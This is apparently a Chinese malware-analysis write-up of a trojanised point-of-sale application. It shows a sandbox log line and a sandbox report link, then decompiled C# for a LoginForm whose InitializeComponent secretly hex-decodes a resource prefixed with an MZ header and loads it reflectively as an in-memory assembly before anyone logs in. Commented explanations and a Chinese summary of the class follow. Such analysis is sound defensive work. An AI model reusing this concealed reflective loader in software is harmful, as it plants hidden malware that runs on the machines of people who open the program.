09:33:21:179, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:51 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
综上,实际运行时观察到的行为基本上和微步报告中展示的行为类似!
https://s.threatbook.com/report/file/99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292
入口:
分析下这个类的作用:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Drawing;
using System.Reflection;
using System.Windows.Forms;
using BusinessLayer;
using Entities;

namespace UILayer
{
    // Token: 0x02000003 RID: 3
    /// <summary>
    /// Decompiled login form of a point-of-sale style application.
    /// The login/role-dispatch logic is ordinary WinForms code; what matters for
    /// analysis is that <see cref="InitializeComponent"/> also carries a second,
    /// unrelated piece of logic: it reads the string resource "Pigue", prepends
    /// "4D5A9" (the hex of an MZ signature plus the first nibble of the next byte),
    /// hex-decodes the result into a byte array, loads it as an in-memory assembly
    /// through a reflective call to Assembly.Load, and instantiates that assembly's
    /// first exported type with the strings in <see cref="T"/> as constructor
    /// arguments. Because the constructor calls InitializeComponent, this happens
    /// when the form is constructed, before any user interaction.
    /// </summary>
    public class LoginForm : Form
    {
        // Token: 0x06000002 RID: 2 RVA: 0x0000206B File Offset: 0x0000026B
        /// <summary>
        /// Constructs the form. All control setup — and the embedded assembly
        /// loader — runs inside <see cref="InitializeComponent"/>.
        /// </summary>
        public LoginForm()
        {
            this.InitializeComponent();
        }

        // Token: 0x06000003 RID: 3 RVA: 0x00002099 File Offset: 0x00000299
        /// <summary>Exit button handler: terminates the whole application.</summary>
        private void btnExit_Click(object sender, EventArgs e)
        {
            Application.Exit();
        }

        // Token: 0x06000004 RID: 4 RVA: 0x000020A4 File Offset: 0x000002A4
        /// <summary>
        /// Login button handler. Copies the two text boxes into <see cref="_log"/>,
        /// validates them through <c>posBusiness.CheckLogin</c>, and opens the form
        /// matching the title returned by <c>posBusiness.GetTitle</c>
        /// ("PosEmployee", "Manager" or "InventoryEmployee"). Empty fields or a
        /// failed check show a "Login Failed!" message box; an unknown title
        /// silently does nothing.
        /// </summary>
        /// <param name="sender">Event source (unused).</param>
        /// <param name="e">Event data (unused).</param>
        public void btnLogin_Click_1(object sender, EventArgs e)
        {
            this._log.Id = this.tbUserID.Text;
            this._log.Password = this.tbPassword.Text;
            bool flag = this.tbUserID.Text != "" && this.tbPassword.Text != "";
            if (flag)
            {
                bool flag2 = this.posBusiness.CheckLogin(this._log);
                if (flag2)
                {
                    // GetTitle is re-queried for each role rather than cached; the
                    // decompiler preserved that as-is.
                    bool flag3 = this.posBusiness.GetTitle(this._log) == "PosEmployee";
                    if (flag3)
                    {
                        base.Hide();
                        PosSystem _pos = new PosSystem();
                        _pos.Show();
                    }
                    else
                    {
                        bool flag4 = this.posBusiness.GetTitle(this._log) == "Manager";
                        if (flag4)
                        {
                            base.Hide();
                            ManagerForm _manager = new ManagerForm();
                            _manager.Show();
                        }
                        else
                        {
                            bool flag5 = this.posBusiness.GetTitle(this._log) == "InventoryEmployee";
                            if (flag5)
                            {
                                base.Hide();
                                ViewInventory _inventory = new ViewInventory();
                                _inventory.Show();
                            }
                        }
                    }
                }
                else
                {
                    MessageBox.Show("Login Failed!", "Warning", MessageBoxButtons.RetryCancel, MessageBoxIcon.Exclamation);
                }
            }
            else
            {
                MessageBox.Show("Login Failed!", "Warning", MessageBoxButtons.RetryCancel, MessageBoxIcon.Exclamation);
            }
        }

        // Token: 0x06000005 RID: 5 RVA: 0x0000220C File Offset: 0x0000040C
        /// <summary>Enter on the login button triggers a click and swallows the key.</summary>
        private void btnLogin_KeyDown(object sender, KeyEventArgs e)
        {
            bool flag = e.KeyCode == Keys.Return;
            if (flag)
            {
                this.btnLogin.PerformClick();
                e.SuppressKeyPress = true;
                e.Handled = true;
            }
        }

        // Token: 0x06000006 RID: 6 RVA: 0x00002248 File Offset: 0x00000448
        /// <summary>Enter in the password box triggers a login click and swallows the key.</summary>
        private void tbPassword_KeyDown(object sender, KeyEventArgs e)
        {
            bool flag = e.KeyCode == Keys.Return;
            if (flag)
            {
                this.btnLogin.PerformClick();
                e.SuppressKeyPress = true;
                e.Handled = true;
            }
        }

        // Token: 0x06000007 RID: 7 RVA: 0x00002284 File Offset: 0x00000484
        /// <summary>Standard designer-generated dispose: releases <see cref="components"/> if present.</summary>
        /// <param name="disposing">True when called from Dispose(), false from the finalizer.</param>
        protected override void Dispose(bool disposing)
        {
            bool flag = disposing && this.components != null;
            if (flag)
            {
                this.components.Dispose();
            }
            base.Dispose(disposing);
        }

        // Token: 0x06000008 RID: 8 RVA: 0x000022BC File Offset: 0x000004BC
        /// <summary>
        /// Designer-style control setup with a loader interleaved into it. The
        /// loader statements are spread between unrelated UI property assignments
        /// (resource lookup after <c>tbUserID.Location</c>, hex decoding after
        /// <c>pBoxUser.TabIndex</c>, assembly load after
        /// <c>labelSuperShopName.Location</c>), which is why a skim of this method
        /// reads as plain form layout. The loader's observable behaviour is an
        /// in-memory Assembly.Load of a byte array followed by Activator.CreateInstance
        /// of its first exported type — no file is written by this class itself.
        /// </summary>
        private void InitializeComponent()
        {
            this.panelLogin = new Panel();
            this.btnLogin = new Button();
            this.btnExit = new Button();
            this.label1 = new Label();
            this.tableLayoutPanel1 = new TableLayoutPanel();
            this.tbUserID = new TextBox();
            this.tbPassword = new TextBox();
            this.pBoxUser = new PictureBox();
            this.pBoxPass = new PictureBox();
            this.labelSuperShopName = new Label();
            this.panelLogin.SuspendLayout();
            this.tableLayoutPanel1.SuspendLayout();
            ((ISupportInitialize)this.pBoxUser).BeginInit();
            ((ISupportInitialize)this.pBoxPass).BeginInit();
            base.SuspendLayout();
            this.panelLogin.Anchor = AnchorStyles.None;
            this.panelLogin.BackColor = Color.Transparent;
            this.panelLogin.BorderStyle = BorderStyle.Fixed3D;
            this.panelLogin.Controls.Add(this.btnLogin);
            this.panelLogin.Controls.Add(this.btnExit);
            this.panelLogin.Controls.Add(this.label1);
            this.panelLogin.Controls.Add(this.tableLayoutPanel1);
            this.panelLogin.Location = new Point(230, 173);
            this.panelLogin.Name = "panelLogin";
            this.panelLogin.Size = new Size(339, 206);
            this.panelLogin.TabIndex = 0;
            this.btnLogin.BackColor = Color.White;
            this.btnLogin.BackgroundImageLayout = ImageLayout.None;
            this.btnLogin.FlatStyle = FlatStyle.System;
            this.btnLogin.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
            this.btnLogin.Location = new Point(7, 138);
            this.btnLogin.Name = "btnLogin";
            this.btnLogin.Size = new Size(100, 28);
            this.btnLogin.TabIndex = 2;
            this.btnLogin.Text = "Login";
            this.btnLogin.UseVisualStyleBackColor = false;
            this.btnLogin.Click += this.btnLogin_Click_1;
            this.btnLogin.KeyDown += this.btnLogin_KeyDown;
            this.btnExit.BackColor = Color.White;
            this.btnExit.BackgroundImageLayout = ImageLayout.None;
            this.btnExit.FlatStyle = FlatStyle.System;
            this.btnExit.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
            this.btnExit.Location = new Point(109, 138);
            this.btnExit.Name = "btnExit";
            this.btnExit.Size = new Size(100, 28);
            this.btnExit.TabIndex = 3;
            this.btnExit.Text = "Exit";
            this.btnExit.UseVisualStyleBackColor = false;
            this.btnExit.Click += this.btnExit_Click;
            this.label1.BackColor = Color.Transparent;
            this.label1.Font = new Font("Monotype Corsiva", 26.25f, FontStyle.Italic, GraphicsUnit.Point, 0);
            this.label1.ForeColor = Color.White;
            this.label1.Location = new Point(3, 0);
            this.label1.Name = "label1";
            this.label1.Size = new Size(104, 55);
            this.label1.TabIndex = 0;
            this.label1.Text = "Login";
            this.tableLayoutPanel1.ColumnCount = 2;
            this.tableLayoutPanel1.ColumnStyles.Add(new ColumnStyle(SizeType.Percent, 13.98176f));
            this.tableLayoutPanel1.ColumnStyles.Add(new ColumnStyle(SizeType.Percent, 86.01823f));
            this.tableLayoutPanel1.Controls.Add(this.tbUserID, 1, 0);
            this.tableLayoutPanel1.Controls.Add(this.tbPassword, 1, 1);
            this.tableLayoutPanel1.Controls.Add(this.pBoxUser, 0, 0);
            this.tableLayoutPanel1.Controls.Add(this.pBoxPass, 0, 1);
            this.tableLayoutPanel1.Location = new Point(3, 58);
            this.tableLayoutPanel1.Name = "tableLayoutPanel1";
            this.tableLayoutPanel1.RowCount = 2;
            this.tableLayoutPanel1.RowStyles.Add(new RowStyle(SizeType.Percent, 50f));
            this.tableLayoutPanel1.RowStyles.Add(new RowStyle(SizeType.Percent, 50f));
            this.tableLayoutPanel1.Size = new Size(329, 74);
            this.tableLayoutPanel1.TabIndex = 1;
            this.tbUserID.BackColor = SystemColors.ControlLightLight;
            this.tbUserID.Dock = DockStyle.Fill;
            this.tbUserID.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
            this.tbUserID.ForeColor = SystemColors.WindowText;
            this.tbUserID.Location = new Point(48, 3);
            // Loader step 1: the payload lives in ManagerForm's resources, not this
            // form's — note typeof(ManagerForm), while the form being built is LoginForm.
            ComponentResourceManager resources = new ComponentResourceManager(typeof(ManagerForm));
            this.tbUserID.Name = "tbUserID";
            this.tbUserID.Size = new Size(278, 26);
            this.tbUserID.TabIndex = 0;
            this.tbPassword.Dock = DockStyle.Fill;
            this.tbPassword.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
            this.tbPassword.Location = new Point(48, 40);
            this.tbPassword.Name = "tbPassword";
            this.tbPassword.PasswordChar = '*';
            this.tbPassword.Size = new Size(278, 26);
            this.tbPassword.TabIndex = 1;
            this.tbPassword.UseSystemPasswordChar = true;
            this.pBoxUser.BackgroundImageLayout = ImageLayout.Stretch;
            this.pBoxUser.Location = new Point(3, 3);
            this.pBoxUser.Name = "pBoxUser";
            this.pBoxUser.Size = new Size(39, 31);
            this.pBoxUser.TabIndex = 2;
            // Loader step 2: "4D5A9" is five hex digits — "4D 5A" (the MZ signature)
            // plus the high nibble of the third byte. The stored "Pigue" string
            // therefore starts mid-byte, so the resource on its own does not begin
            // with a recognisable PE header; only the concatenation does.
            string hexString = "4D5A9" + resources.GetString("Pigue");
            List<byte> decBytes2 = new List<byte>();
            // Plain hex-to-bytes: each 2-char pair is parsed as base-16 and the first
            // byte of the Int16 (its low byte on little-endian hosts) is kept.
            for (int i = 0; i < hexString.Length; i += 2)
            {
                byte b = BitConverter.GetBytes(Convert.ToInt16(hexString.Substring(i, 2), 16))[0];
                decBytes2.Add(b);
            }
            this.pBoxUser.TabStop = false;
            this.pBoxPass.BackgroundImageLayout = ImageLayout.Stretch;
            this.pBoxPass.Location = new Point(3, 40);
            this.pBoxPass.Name = "pBoxPass";
            this.pBoxPass.Size = new Size(39, 31);
            this.pBoxPass.TabIndex = 3;
            this.pBoxPass.TabStop = false;
            this.labelSuperShopName.Anchor = AnchorStyles.None;
            this.labelSuperShopName.BackColor = Color.Transparent;
            this.labelSuperShopName.FlatStyle = FlatStyle.Flat;
            this.labelSuperShopName.Font = new Font("Monotype Corsiva", 45f, FontStyle.Bold | FontStyle.Italic, GraphicsUnit.Point, 0);
            this.labelSuperShopName.ForeColor = Color.Transparent;
            this.labelSuperShopName.Location = new Point(132, 67);
            // Loader step 3: Assembly.Load(byte[]) invoked through Type.GetType +
            // InvokeMember so that no direct Assembly.Load call appears in the IL;
            // the decoded bytes never touch disk here. The result is the same as a
            // direct Assembly.Load(decBytes2.ToArray()).
            Assembly Wr_99 = (Assembly)Type.GetType("System.Reflection.Assembly").InvokeMember("Load", BindingFlags.InvokeMethod, null, null, new object[] { decBytes2.ToArray() });
            // Loader step 4: construct the loaded assembly's first exported type,
            // passing the three strings in T as constructor arguments. Their meaning
            // belongs to the second stage and is not visible from this class.
            Type type = Wr_99.GetExportedTypes()[0];
            object[] t = LoginForm.T;
            Activator.CreateInstance(type, t);
            this.labelSuperShopName.Name = "labelSuperShopName";
            this.labelSuperShopName.Size = new Size(554, 91);
            this.labelSuperShopName.TabIndex = 1;
            this.labelSuperShopName.Text = "Friend Super Shop";
            this.labelSuperShopName.TextAlign = ContentAlignment.MiddleCenter;
            base.AutoScaleDimensions = new SizeF(6f, 13f);
            base.AutoScaleMode = AutoScaleMode.Font;
            this.BackgroundImageLayout = ImageLayout.Stretch;
            base.ClientSize = new Size(782, 461);
            base.ControlBox = false;
            base.Controls.Add(this.labelSuperShopName);
            base.Controls.Add(this.panelLogin);
            base.FormBorderStyle = FormBorderStyle.Fixed3D;
            base.MaximizeBox = false;
            base.MinimizeBox = false;
            base.Name = "LoginForm";
            base.StartPosition = FormStartPosition.CenterScreen;
            this.Text = "LoginForm";
            base.WindowState = FormWindowState.Maximized;
            this.panelLogin.ResumeLayout(false);
            this.tableLayoutPanel1.ResumeLayout(false);
            this.tableLayoutPanel1.PerformLayout();
            ((ISupportInitialize)this.pBoxUser).EndInit();
            ((ISupportInitialize)this.pBoxPass).EndInit();
            base.ResumeLayout(false);
        }

        // Token: 0x04000001 RID: 1
        // Business-layer facade used for CheckLogin/GetTitle (declared outside this file).
        private PosBusiness posBusiness = new PosBusiness();

        // Token: 0x04000002 RID: 2
        // Credential holder filled from the text boxes on login (type from Entities).
        private Login _log = new Login();

        // Token: 0x04000003 RID: 3
        // Constructor arguments handed to the second-stage type in InitializeComponent.
        // Kept public/static, presumably so the loaded assembly can read them back.
        public static string[] T = new string[] { "7754794F", "6E7A62", "BusinessLayer" };

        // Token: 0x04000004 RID: 4
        private IContainer components = null;

        // Token: 0x04000005 RID: 5
        private Panel panelLogin;

        // Token: 0x04000006 RID: 6
        private Label label1;

        // Token: 0x04000007 RID: 7
        private TableLayoutPanel tableLayoutPanel1;

        // Token: 0x04000008 RID: 8
        private PictureBox pBoxUser;

        // Token: 0x04000009 RID: 9
        private PictureBox pBoxPass;

        // Token: 0x0400000A RID: 10
        private Button btnExit;

        // Token: 0x0400000B RID: 11
        private TextBox tbUserID;

        // Token: 0x0400000C RID: 12
        private TextBox tbPassword;

        // Token: 0x0400000D RID: 13
        private Button btnLogin;

        // Token: 0x0400000E RID: 14
        private Label labelSuperShopName;
    }
}
这个类是一个名为 LoginForm 的 Windows 窗体(Form)类,用于实现一个用户登录界面。它包含了一些控件和事件处理程序,以及与业务逻辑层和实体相关的一些操作。
以下是这个类的主要作用和功能的分析:
- 构造函数 LoginForm():构造函数是类实例化时首先执行的方法。在这里,构造函数通过调用 InitializeComponent() 方法来初始化界面的组件和布局。
- 按钮事件 btnExit_Click(object sender, EventArgs e):当退出按钮被点击时,这个事件处理程序调用 Application.Exit() 方法来关闭整个应用程序。
- 按钮事件 btnLogin_Click_1(object sender, EventArgs e):当登录按钮被点击时,这个事件处理程序执行用户登录的逻辑。它首先从输入框中获取用户ID和密码,然后调用 posBusiness.CheckLogin(this._log) 来检查用户登录是否成功。如果登录成功,根据用户的角色不同,会打开不同的窗体(PosSystem、ManagerForm、ViewInventory)。
- 按钮事件 btnLogin_KeyDown(object sender, KeyEventArgs e) 和 tbPassword_KeyDown(object sender, KeyEventArgs e):这两个事件处理程序捕捉键盘输入事件,如果用户按下回车键,就模拟点击了登录按钮。
- 方法 Dispose(bool disposing):这是一个用来释放资源的方法,当窗体被销毁时会调用。在这里,它释放了 components 对象所持有的资源。
- 方法 InitializeComponent():这个方法初始化界面的各个控件,包括登录按钮、退出按钮、文本框、图片框等等。它也设置了窗体的一些属性,比如标题、大小等。值得注意的是,这段设计器风格的初始化代码中还夹杂了另一段逻辑:从 ManagerForm 的资源中读取字符串 "Pigue",在前面拼接 "4D5A9"(即 PE 文件 MZ 头的十六进制)后按十六进制解码为字节数组,再通过反射调用 Assembly.Load 从内存加载该程序集,并用静态字段 T 中的三个字符串作为构造参数实例化其第一个导出类型——这一切在窗体构造时、用户尚未登录前就已执行。
除了上述的主要功能,还有以下值得注意的地方:
- 这个类使用了 BusinessLayer 和 Entities 命名空间中的内容,暗示着它与业务逻辑和实体对象相关。
- 它包含了登录逻辑,根据用户角色的不同打开不同的窗体。这可能意味着这个类是整个应用程序的入口点,负责用户的身份验证和角色判断。
总的来说,这个 LoginForm 类是一个用户登录界面的实现,负责用户登录的逻辑和界面展示,同时也涉及到了与业务逻辑和实体对象的交互。
不分析了,代码也没有混淆啥的。。。